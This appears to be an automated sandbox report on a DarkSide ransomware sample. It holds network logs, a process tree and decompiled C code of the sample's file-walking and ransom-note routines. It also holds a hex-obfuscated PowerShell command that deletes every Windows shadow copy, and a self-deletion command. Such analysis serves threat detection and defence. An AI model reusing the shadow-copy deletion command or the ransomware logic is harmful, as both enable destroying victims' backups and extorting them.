May 1, 2021 06:02:01.354759932 CEST	53	56209	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.354826927 CEST	53	64539	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.354854107 CEST	53	50499	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.356842041 CEST	53	57167	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.357245922 CEST	53	61894	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.359385014 CEST	53	59946	8.8.8.8	192.168.2.3
May 1, 2021 06:02:02.021855116 CEST	65267	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:02.073360920 CEST	53	65267	8.8.8.8	192.168.2.3
May 1, 2021 06:02:02.860122919 CEST	63148	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:02.918569088 CEST	53	63148	8.8.8.8	192.168.2.3
May 1, 2021 06:02:09.050707102 CEST	50945	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:09.107491970 CEST	53	50945	8.8.8.8	192.168.2.3
May 1, 2021 06:02:26.612629890 CEST	64396	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:26.669533968 CEST	53	64396	8.8.8.8	192.168.2.3
May 1, 2021 06:02:27.266350031 CEST	59246	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:27.323138952 CEST	53	59246	8.8.8.8	192.168.2.3
May 1, 2021 06:02:27.954442024 CEST	54595	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:28.005805016 CEST	53	54595	8.8.8.8	192.168.2.3
May 1, 2021 06:02:28.415169001 CEST	54610	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:28.471988916 CEST	53	54610	8.8.8.8	192.168.2.3
May 1, 2021 06:02:28.501214027 CEST	55245	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:28.559714079 CEST	53	55245	8.8.8.8	192.168.2.3
May 1, 2021 06:02:29.220364094 CEST	61740	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:29.280143976 CEST	53	61740	8.8.8.8	192.168.2.3
May 1, 2021 06:02:29.986509085 CEST	57458	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:30.049607038 CEST	53	57458	8.8.8.8	192.168.2.3
May 1, 2021 06:02:30.718791962 CEST	62298	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:30.767518044 CEST	53	62298	8.8.8.8	192.168.2.3
May 1, 2021 06:02:32.092012882 CEST	59456	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:32.150382996 CEST	53	59456	8.8.8.8	192.168.2.3
May 1, 2021 06:02:33.034701109 CEST	64380	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:33.094901085 CEST	53	64380	8.8.8.8	192.168.2.3
May 1, 2021 06:02:33.604178905 CEST	60603	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:33.663634062 CEST	53	60603	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 1, 2021 06:01:51.252677917 CEST	192.168.2.1	192.168.2.3	829d	(Port unreachable)	Destination Unreachable
May 1, 2021 06:01:52.739573002 CEST	192.168.2.1	192.168.2.3	829d	(Port unreachable)	Destination Unreachable
May 1, 2021 06:01:54.255220890 CEST	192.168.2.1	192.168.2.3	829d	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 1, 2021 06:00:50.416008949 CEST	192.168.2.3	8.8.8.8	0x2d14	Standard query (0)	securebestapp20.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 1, 2021 06:00:50.475758076 CEST	8.8.8.8	192.168.2.3	0x2d14	No error (0)	securebestapp20.com		185.105.109.19	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: rUUR0qQI22.exe PID: 3508 Parent PID: 5660

General

Start time:	06:00:49
Start date:	01/05/2021
Path:	C:\Users\user\Desktop\rUUR0qQI22.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\rUUR0qQI22.exe'
Imagebase:	0xce0000
File size:	60416 bytes
MD5 hash:	9D418ECC0F3BF45029263B0944236884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 1004 Parent PID: 3508

General

Start time:	06:01:14
Start date:	01/05/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ep bypass -c '(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Imagebase:	0x7ff678f10000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2200 Parent PID: 1004

General

Start time:	06:01:15
Start date:	01/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 8768 Parent PID: 3508

General

Start time:	06:02:31
Start date:	01/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Imagebase:	0x900000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 8776 Parent PID: 8768

General

Start time:	06:02:32
Start date:	01/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rUUR0qQI22.exe PID: 3508 Parent PID: 5660 rUUR0qQI22.exeCOMMON

Executed Functions

Function 00CE67AD, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 235
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE67AD(WCHAR* _a4) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v17;
				struct _WIN32_FIND_DATAW _v612;
				void* _t55;
				signed int _t62;
				int _t67;
				signed short _t68;
				signed int _t71;
				wchar_t* _t72;
				char _t77;
				void* _t78;
				wchar_t* _t79;
				wchar_t* _t80;
				signed int _t84;
				char _t90;
				signed int _t99;
				wchar_t* _t101;
				wchar_t* _t102;
				wchar_t* _t104;
				void* _t105;
				void* _t106;

				_t55 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000); // executed
				_v12 = _t55;
				if(_v12 == 0) {
					L44:
					return _t55;
				}
				_t55 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000); // executed
				_v16 = _t55;
				if(_v16 == 0) {
					goto L44;
				}
				_v17 = 0;
				E00CE13DA(E00CE13DA(_t55, _v12, 0x10000), _v16, 0x10000);
				E00CE13DA( &_v612,  &_v612, 0x250);
				_t102 = _v12;
				wcscpy(_t102, _a4);
				_t106 = _t105 + 8;
				E00CE5A9C(_t102); // executed
				if( *0xcf07f3 != 0) {
					_push(0);
					E00CE3BD8(_t102,  *0xcf0920); // executed
				}
				_t62 = GetFileAttributesW(_t102); // executed
				if((_t62 & 0x00000010) != 0) {
					PathAddBackslashW(_t102);
					_t99 = wcslen(_t102);
					_t106 = _t106 + 4;
					 *((short*)(_t102 + _t99 * 2)) = 0x2a;
				}
				_t55 = FindFirstFileExW(_t102, 0,  &_v612, 0, 0,  *0xcf0934); // executed
				_v8 = _t55;
				if(_v8 == 0xffffffff) {
					goto L44;
				} else {
					do {
						_t101 =  &(_v612.cFileName);
						if( *_t101 != 0x2e &&  *_t101 != 0x2e002e) {
							_t68 = _v612.dwFileAttributes;
							if((_t68 & 0x00000400) != 0) {
								goto L37;
							}
							if((_t68 & 0x00000010) == 0) {
								if( *0xcf07f3 == 0) {
									L23:
									if( *0xcf07ec != 0) {
										if(E00CE5B11(_t101,  *0xcf08fc) != 0) {
											goto L37;
										}
										L26:
										if( *0xcf07ed != 0) {
											if(E00CE5B65(_t101,  *0xcf0900) != 0) {
												goto L37;
											}
											L29:
											if( *0xcf07ef != 0 && E00CE5B65(_t101,  *0xcf0908) != 0) {
												_t77 =  *0xcf07e0; // 0x1
												_v17 = _t77;
												 *0xcf07e0 = 1;
											}
											_t71 = GetFileAttributesW(_a4); // executed
											if((_t71 & 0x00000010) == 0) {
												_t72 = wcsrchr(_t102, 0x5c);
												_t106 = _t106 + 8;
												 *_t72 = 0;
												E00CE6245(_t101, _v612.nFileSizeLow, _v612.nFileSizeHigh, _t102);
											} else {
												E00CE6245(_t101, _v612.nFileSizeLow, _v612.nFileSizeHigh, _a4); // executed
											}
											if(_v17 != 0) {
												 *0xcf07e0 = _v17;
												_v17 = 0;
											}
											goto L37;
										}
										goto L29;
									}
									goto L26;
								}
								_t78 =  *0xcf0cd6(_t101, "README.418990b0.TXT");
								_t106 = _t106 + 8;
								if(_t78 != 0) {
									_t79 = wcsstr(_t101, 0xceb5c2);
									_t106 = _t106 + 8;
									if(_t79 == 0) {
										goto L23;
									}
									_t80 = wcsstr(_t101, 0xceb5d4);
									_t106 = _t106 + 8;
									if(_t80 == 0 || E00CE3C33(_t101, _a4,  *0xcf0930) == 0) {
										goto L23;
									} else {
										goto L37;
									}
								}
								goto L37;
							}
							if( *0xcf07eb != 0) {
								if(E00CE5B11(_t101,  *0xcf08f8) != 0) {
									L15:
									goto L37;
								}
								L14:
								_t104 = _v16;
								wcscpy(_t104, _t102);
								_t84 = wcslen(_t104);
								 *((short*)(_t104 + _t84 * 2 - 2)) = 0;
								_t29 = _t84 * 2; // -2
								wcscpy(_t104 + _t29 - 2, _t101);
								_t106 = _t106 + 0x14;
								E00CE67AD(_t104); // executed
								goto L15;
							}
							goto L14;
						}
						L37:
						E00CE13DA( &_v612,  &_v612, 0x250);
						_t67 = FindNextFileW(_v8,  &_v612); // executed
					} while (_t67 != 0);
					FindClose(_v8); // executed
					if( *0xcf07ee != 0) {
						 *(wcsrchr(_v12, 0x5c)) = 0;
						if(E00CE5B11( &((wcsrchr(_v12, 0x5c))[0]),  *0xcf0904) != 0) {
							if(PathIsDirectoryEmptyW(_v12) == 0) {
								E00CE5490(_v12);
							}
							RemoveDirectoryW(_v12);
						}
					}
					RtlFreeHeap( *0xcf0a9e, 0, _v12); // executed
					_t90 = RtlFreeHeap( *0xcf0a9e, 0, _v16); // executed
					return _t90;
				}
			}

0x00ce67c8
0x00ce67ce
0x00ce67d5
0x00ce6b04
0x00ce6b04
0x00ce6b04
0x00ce67e8
0x00ce67ee
0x00ce67f5
0x00000000
0x00000000
0x00ce67fb
0x00ce6814
0x00ce6825
0x00ce682d
0x00ce6832
0x00ce6838
0x00ce683c
0x00ce6848
0x00ce684a
0x00ce6853
0x00ce6853
0x00ce6859
0x00ce6864
0x00ce6867
0x00ce686e
0x00ce6874
0x00ce6877
0x00ce6877
0x00ce6891
0x00ce6897
0x00ce689e
0x00000000
0x00ce68a4
0x00ce68a4
0x00ce68a4
0x00ce68ad
0x00ce68bf
0x00ce68c9
0x00000000
0x00000000
0x00ce68d3
0x00ce6930
0x00ce698a
0x00ce6991
0x00ce69a3
0x00000000
0x00000000
0x00ce69a9
0x00ce69b0
0x00ce69c2
0x00000000
0x00000000
0x00ce69c8
0x00ce69cf
0x00ce69e1
0x00ce69e6
0x00ce69e9
0x00ce69e9
0x00ce69f3
0x00ce69fe
0x00ce6a1a
0x00ce6a20
0x00ce6a23
0x00ce6a36
0x00ce6a00
0x00ce6a10
0x00ce6a10
0x00ce6a3f
0x00ce6a44
0x00ce6a49
0x00ce6a49
0x00000000
0x00ce6a3f
0x00000000
0x00ce69b2
0x00000000
0x00ce6993
0x00ce6938
0x00ce693e
0x00ce6943
0x00ce6952
0x00ce6958
0x00ce695d
0x00000000
0x00000000
0x00ce6965
0x00ce696b
0x00ce6970
0x00000000
0x00ce6985
0x00000000
0x00ce6985
0x00ce6970
0x00000000
0x00ce6945
0x00ce68dc
0x00ce68ee
0x00ce6924
0x00000000
0x00ce6924
0x00ce68f0
0x00ce68f0
0x00ce68f5
0x00ce68ff
0x00ce6908
0x00ce6910
0x00ce6915
0x00ce691b
0x00ce691f
0x00000000
0x00ce691f
0x00000000
0x00ce68de
0x00ce6a4d
0x00ce6a59
0x00ce6a68
0x00ce6a6e
0x00ce6a79
0x00ce6a86
0x00ce6a96
0x00ce6aba
0x00ce6ac7
0x00ce6acc
0x00ce6acc
0x00ce6ad4
0x00ce6ad4
0x00ce6aba
0x00ce6ae5
0x00ce6af6
0x00000000
0x00ce6af6

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CE67C8
RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00CE67E8
wcscpy.NTDLL ref: 00CE6832

Part of subcall function 00CE5A9C: GetNamedSecurityInfoW.ADVAPI32(00CE6841,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00CE5ABA
Part of subcall function 00CE5A9C: SetEntriesInAclW.ADVAPI32(00000001,00CF0790,00000000,00CE6841,?,?,?), ref: 00CE5AD2
Part of subcall function 00CE5A9C: SetNamedSecurityInfoW.ADVAPI32(00CE6841,00000001,00000005,00CF0784,00000000,00CE6841,00000000,?,?,?), ref: 00CE5AEF
Part of subcall function 00CE5A9C: RtlFreeHeap.NTDLL(00000000,00CE6841), ref: 00CE5B00

GetFileAttributesW.KERNEL32(00000000,00000000,?,?), ref: 00CE6859
PathAddBackslashW.SHLWAPI(00000000,?,?), ref: 00CE6867
wcslen.NTDLL ref: 00CE686E
FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,?,?), ref: 00CE6891
wcscpy.NTDLL ref: 00CE68F5
wcslen.NTDLL ref: 00CE68FF
wcscpy.NTDLL ref: 00CE6915
_wcsicmp.NTDLL ref: 00CE6938
FindNextFileW.KERNEL32(000000FF,?,?,00000250,?,?), ref: 00CE6A68
FindClose.KERNEL32(000000FF,?,?), ref: 00CE6A79
wcsrchr.NTDLL ref: 00CE6A8D
wcsrchr.NTDLL ref: 00CE6AA0
PathIsDirectoryEmptyW.SHLWAPI(00000000), ref: 00CE6ABF
RemoveDirectoryW.KERNEL32(00000000), ref: 00CE6AD4
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6AE5
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6AF6

Part of subcall function 00CE3BD8: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000000,?,?,?), ref: 00CE3BF2
Part of subcall function 00CE3BD8: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?), ref: 00CE3BFB
Part of subcall function 00CE3BD8: strlen.NTDLL ref: 00CE3C04
Part of subcall function 00CE3BD8: SetCurrentDirectoryW.KERNEL32(?,README.418990b0.TXT,00000000,00000000,?), ref: 00CE3C22

Part of subcall function 00CE5B11: _wcsicmp.NTDLL ref: 00CE5B24

Strings

README.418990b0.TXT, xrefs: 00CE6932

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryHeap$CurrentFileFindFreewcscpy$AllocateInfoNamedPathSecurity_wcsicmpwcslenwcsrchr$AttributesBackslashCloseEmptyEntriesFirstNextRemovestrlen
String ID: README.418990b0.TXT
API String ID: 1750688231-3504603320
Opcode ID: 0fd71cc9f8ca38dd539927aaedcf207eb9fd278863e84a4a739d42da9dbf393f
Instruction ID: 53566e8565c9d13d09fb6f52af42f3dba632d52a75b4ee43b4673f7261321a6d
Opcode Fuzzy Hash: 0fd71cc9f8ca38dd539927aaedcf207eb9fd278863e84a4a739d42da9dbf393f
Instruction Fuzzy Hash: CC91A270910284FBDB22AB66DC49BBE7F39AF20B85F2440A4F505710B3D7756A90EB17

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7E5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 217
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CE7E5D(void* __eflags, void* __fp0) {
				int _v8;
				char _v12;
				intOrPtr _t30;
				void* _t42;
				void* _t50;
				void* _t61;
				void* _t73;
				wchar_t* _t76;
				wchar_t* _t78;
				void* _t99;

				_t99 = __fp0;
				 *0xcf0a9e = E00CE7E53();
				 *0xcf0aa2 = E00CE7E49();
				E00CE171C(0xced4cd, 0xced4dd, 0x10);
				E00CE182A();
				E00CE289B(E00CE285C(0xffffffff, 0xcf0a9a));
				if(E00CE1F0F() > 0x3c) {
					 *0xcf0934 = 2;
				}
				NtSetInformationThread( ~( *0xcf07f6 & 0x000000ff), 1 + ( *0xcf07f6 & 0x000000ff) * 8, 0, 0);
				if( *0xcf0eae() == 0) {
					if(E00CE4966() != 0) {
						if( *0xcf07e8 == 0) {
							goto L10;
						} else {
							return E00CE39EA();
						}
					} else {
						 *0xcf0924 = 0;
						goto L10;
					}
				} else {
					 *0xcf0924 = 1;
					L10:
					if( *0xcf07e9 != 0) {
						E00CE4B67(); // executed
					}
					E00CE4C32(3); // executed
					_t30 = E00CE4A20(); // executed
					 *0xcf0928 = _t30;
					if( *0xcf0928 != 0) {
						 *0xcf0aa6 = E00CE2C38();
					}
					E00CE3A92(".418990b0"); // executed
					if( *0xcf07ea == 0) {
						 *0xcf092c = 0;
					} else {
						E00CE3DAE(0xcf099a);
						E00CE16D5(0xceb20a,  *0xceb206);
						E00CE16D5(0xceb216,  *0xceb212);
						 *0xcf092c = E00CE3DF5();
					}
					if( *0xcf07f3 != 0) {
						E00CE3B91("README.418990b0.TXT");
					}
					if( *0xcf0924 != 0 &&  *0xcf07f4 != 0) {
						E00CE4037(".418990b0"); // executed
					}
					_t73 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
					if(_v8 != 3) {
						if(_v8 != 2) {
							goto L38;
						} else {
							_t76 = wcsrchr( *(_t73 + 4), 0x2e);
							if(_t76 == 0) {
								L37:
								return E00CE7925( *(_t73 + 4), 0);
							} else {
								E00CE16D5(0xceb12e,  *0xceb12a);
								_push(0xceb12e);
								_push(_t76);
								if(E00CE13DA( *0xcf0cd6(), 0xceb12e,  *0xceb12a) != 0) {
									goto L37;
								} else {
									_t50 = E00CE7166( *(_t73 + 4),  &_v12);
									if(_t50 != 0) {
										return E00CE7925(_v12, 1);
									}
									return _t50;
								}
							}
						}
					} else {
						E00CE16D5(0xceaf20,  *0xceaf1c);
						_push(0xceaf20);
						_push( *(_t73 + 4));
						if(E00CE13DA( *0xcf0cd6(), 0xceaf20,  *0xceaf1c) != 0) {
							L38:
							if( *0xcf07f5 == 0) {
								L42:
								E00CE72C0(_t99); // executed
								CloseHandle(_t73);
							} else {
								E00CE3F60(0xceae74); // executed
								if(OpenMutexW(0x100000, 0, 0xceae74) == 0) {
									_t42 = CreateMutexW(0, 1, 0xceae74); // executed
									_t73 = _t42;
									E00CE13DA(_t42, 0xceae74,  *0xceae70); // executed
									goto L42;
								} else {
								}
							}
							if( *0xcf092c != 0) {
								CloseHandle( *0xcf092c);
							}
							if( *0xcf07e7 != 0) {
								E00CE7D5B();
							}
							return CloseHandle( *0xcf0aa6);
						} else {
							_t78 = wcsrchr( *(_t73 + 8), 0x2e);
							if(_t78 == 0) {
								L29:
								return E00CE7925( *(_t73 + 8), 0);
							} else {
								E00CE16D5(0xceb12e,  *0xceb12a);
								_push(0xceb12e);
								_push(_t78);
								if(E00CE13DA( *0xcf0cd6(), 0xceb12e,  *0xceb12a) != 0) {
									goto L29;
								} else {
									_t61 = E00CE7166( *(_t73 + 8),  &_v12);
									if(_t61 != 0) {
										return E00CE7925(_v12, 1);
									}
									return _t61;
								}
							}
						}
					}
				}
			}

0x00ce7e5d
0x00ce7e7a
0x00ce7e84
0x00ce7e95
0x00ce7e9a
0x00ce7eab
0x00ce7eb8
0x00ce7eba
0x00ce7eba
0x00ce7eda
0x00ce7ef8
0x00ce7f0d
0x00ce7f22
0x00000000
0x00ce7f24
0x00ce7f2c
0x00ce7f2c
0x00ce7f0f
0x00ce7f0f
0x00000000
0x00ce7f0f
0x00ce7efa
0x00ce7efa
0x00ce7f2d
0x00ce7f34
0x00ce7f36
0x00ce7f36
0x00ce7f3d
0x00ce7f42
0x00ce7f47
0x00ce7f53
0x00ce7f5a
0x00ce7f5a
0x00ce7f64
0x00ce7f70
0x00ce7fa8
0x00ce7f72
0x00ce7f77
0x00ce7f87
0x00ce7f97
0x00ce7fa1
0x00ce7fa1
0x00ce7fb9
0x00ce7fc0
0x00ce7fc0
0x00ce7fcc
0x00ce7fdc
0x00ce7fdc
0x00ce7ff4
0x00ce7ffa
0x00ce80b3
0x00000000
0x00ce80b5
0x00ce80c3
0x00ce80c7
0x00ce811a
0x00ce8127
0x00ce80c9
0x00ce80d4
0x00ce80d9
0x00ce80de
0x00ce80fa
0x00000000
0x00ce80fc
0x00ce8103
0x00ce810a
0x00000000
0x00ce8111
0x00ce8119
0x00ce8119
0x00ce80fa
0x00ce80c7
0x00ce8000
0x00ce800e
0x00ce8013
0x00ce8018
0x00ce8034
0x00ce8128
0x00ce812f
0x00ce8176
0x00ce8176
0x00ce817c
0x00ce8131
0x00ce8136
0x00ce8151
0x00ce815e
0x00ce8164
0x00ce8171
0x00000000
0x00000000
0x00ce8153
0x00ce8151
0x00ce8189
0x00ce8191
0x00ce8191
0x00ce819e
0x00ce81a0
0x00ce81a0
0x00ce81b4
0x00ce8036
0x00ce8044
0x00ce8048
0x00ce809b
0x00ce80a8
0x00ce804a
0x00ce8055
0x00ce805a
0x00ce805f
0x00ce807b
0x00000000
0x00ce807d
0x00ce8084
0x00ce808b
0x00000000
0x00ce8092
0x00ce809a
0x00ce809a
0x00ce807b
0x00ce8048
0x00ce8034
0x00ce7ffa

APIs

Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00CE7E9F,00CED4CD,00CED4DD,00000010), ref: 00CE1845
Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00CE7E9F,00CED4CD,00CED4DD), ref: 00CE186E
Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 00CE1898
Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE18C3
Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE18EE
Part of subcall function 00CE182A: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1919

Part of subcall function 00CE285C: NtQueryInformationProcess.NTDLL(00CED4DD,0000001A,00000010,00000004,00000000), ref: 00CE2876

Part of subcall function 00CE289B: RtlAllocateHeap.NTDLL(00000008,00000000,00CF07F8), ref: 00CE28DF
Part of subcall function 00CE289B: RtlAllocateHeap.NTDLL(00000008,00000000,00000038), ref: 00CE292E
Part of subcall function 00CE289B: RtlAllocateHeap.NTDLL(00000008,00000000,00000808), ref: 00CE2969
Part of subcall function 00CE289B: RtlAllocateHeap.NTDLL(00000008,00000000,00000FD8), ref: 00CE29A7
Part of subcall function 00CE289B: RtlAllocateHeap.NTDLL(00000008,00000000,000017A8), ref: 00CE29E5

NtSetInformationThread.NTDLL(00000000,?,00000000,00000000), ref: 00CE7EDA
IsUserAnAdmin.SHELL32 ref: 00CE7EF0
GetCommandLineW.KERNEL32(.418990b0,00000003,?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE7FE1
CommandLineToArgvW.SHELL32(00000000,?,?,00000000,00000000,000000FF,00CF0A9A,00CED4CD,00CED4DD,00000010), ref: 00CE7FEE
_wcsicmp.NTDLL ref: 00CE8019
wcsrchr.NTDLL ref: 00CE803B
_wcsicmp.NTDLL ref: 00CE8060

Strings

README.418990b0.TXT, xrefs: 00CE7FBB
.418990b0, xrefs: 00CE7F5F, 00CE7FD7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AllocateHeap$CommandInformationLine_wcsicmp$AdminArgvProcessQueryThreadUserwcsrchr
String ID: .418990b0$README.418990b0.TXT
API String ID: 2892019128-1802137517
Opcode ID: 077b8bda3a29f59d84bc1248981b1b885d26ad5387e49fa62c92464004ec1eaf
Instruction ID: 303f0cf97369513358e45a2eef5df03e67eba79115643b8cdbaf472206e00223
Opcode Fuzzy Hash: 077b8bda3a29f59d84bc1248981b1b885d26ad5387e49fa62c92464004ec1eaf
Instruction Fuzzy Hash: B771B1715483C0AFEB117BB3AC0BB7E3A65AB04B15F2402A0F954650E3EBB15A54EB53

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5490, Relevance: 25.6, APIs: 17, Instructions: 124
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE5490(wchar_t* _a4) {
				void* _v8;
				wchar_t* _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				void* _t45;
				signed int _t51;
				int _t54;
				signed int _t57;
				signed int _t59;
				char _t66;
				wchar_t* _t67;
				WCHAR* _t68;
				wchar_t* _t70;
				void* _t72;
				void* _t74;
				void* _t77;

				_t45 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000); // executed
				_v12 = _t45;
				if(_v12 == 0) {
					L17:
					return _t45;
				}
				_t45 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000);
				_v16 = _t45;
				if(_v16 == 0) {
					goto L17;
				}
				E00CE13DA(E00CE13DA(_t45, _v12, 0x10000), _v16, 0x10000);
				E00CE13DA( &_v608,  &_v608, 0x250);
				_t68 = _v12;
				wcscpy(_t68, _a4);
				_t51 = wcslen(_t68);
				_t74 = _t72 + 0xc;
				if( *((short*)(_t68 + _t51 * 2 - 2)) == 0x5c) {
					_t68[_t51] = 0x2a;
